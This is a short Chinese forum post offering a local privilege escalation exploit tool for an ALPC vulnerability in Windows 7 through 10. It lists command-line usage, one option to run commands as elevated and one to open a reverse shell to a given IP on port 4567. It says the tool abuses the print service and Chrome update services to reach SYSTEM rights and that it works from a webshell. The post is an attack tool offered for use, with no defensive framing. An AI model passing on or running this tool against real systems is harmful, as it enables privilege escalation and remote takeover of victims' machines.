Advanced Local Procedure Call 利用

发布于 2024-12-01 12:54:37 字数 416 浏览 13 评论 0

关于漏洞不多说什么自己看一下介绍,目前还没有为其分配编号,漏洞针对的是 win7 及 win7 以上到 win10 (因兼容引发的血案)

利用程序

EXP-LPE -e calc //执行命令,如果要执行程序要用绝对路径
EXP-LPE -g ip   //反弹 shell 到 4567 端口

详细说明:
执行命令只能针对 win8 和 win8 以上要问为什么自己去把程序看看利用的是打印服务,利用谷歌浏览器更新服务反弹 shell 是可能有两个权限的一个是用户权限及手动更新服务和 system 系统权限开机延迟启动更新服务这里要说明如果需要的服务被禁用了那自然无法成功而且普通权限下也无法启动停止的服务但是以上这些服务默认都是开启的

webshell 下使用正常

写的匆忙还有一些功能没加还有这个程序可能有一些小 BUG

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

文章
评论
27 人气
更多

推荐作者

冰魂雪魄

文章 0 评论 0

qq_Wl4Sbi

文章 0 评论 0

柳家齐

文章 0 评论 0

无法言说的痛

文章 0 评论 0

魄砕の薆

文章 0 评论 0

盗琴音

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文